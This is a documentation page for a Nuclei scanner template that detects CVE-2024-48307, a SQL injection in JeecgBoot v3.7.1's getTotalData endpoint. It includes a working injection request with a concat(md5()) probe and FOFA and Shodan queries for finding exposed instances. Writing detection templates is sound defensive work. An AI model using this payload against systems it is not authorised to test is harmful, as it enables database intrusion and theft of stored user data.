Skip to content
Nuclei Templates

JeecgBoot v3.7.1 - SQL Injection

ID: CVE-2024-48307

Severity: critical

Author: lbb,s4e-io

Tags: cve2024,cve,jeecg,sqli

Description

Section titled “Description”

The JeecgBoot application is vulnerable to SQL Injection via the getTotalData endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.

YAML Source

Section titled “YAML Source”
id: CVE-2024-48307


info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.17463
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli


variables:
  num: "999999999"


http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}


    payloads:
      path:
        - /jeecg-boot/
        - /


    attack: batteringram
    stop-at-first-match: true


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48307.yaml"

View on Github